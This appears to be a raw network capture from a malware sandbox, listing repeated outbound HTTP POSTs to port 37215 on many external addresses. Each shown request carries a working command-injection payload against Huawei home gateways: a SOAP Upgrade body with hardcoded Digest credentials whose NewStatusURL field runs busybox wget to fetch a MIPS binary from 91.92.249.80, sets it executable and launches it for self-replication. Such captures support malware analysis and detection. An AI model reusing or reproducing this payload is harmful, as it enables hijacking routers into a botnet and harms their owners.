                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2484192.168.2.2357412197.236.206.24037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.710985899 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2485192.168.2.2338032163.37.152.23737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.710997105 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2486192.168.2.2336648157.143.38.937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.711024046 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2487192.168.2.2336012186.156.221.8537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.711066008 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2488192.168.2.2338658197.149.196.19537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.712054014 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2489192.168.2.2353720218.82.208.1637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.712085009 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2490192.168.2.233739241.106.233.16937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.712099075 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2491192.168.2.234865046.189.101.11937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.712106943 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2492192.168.2.233463641.142.241.5337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.712153912 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2493192.168.2.2333750157.166.145.22637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.712197065 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
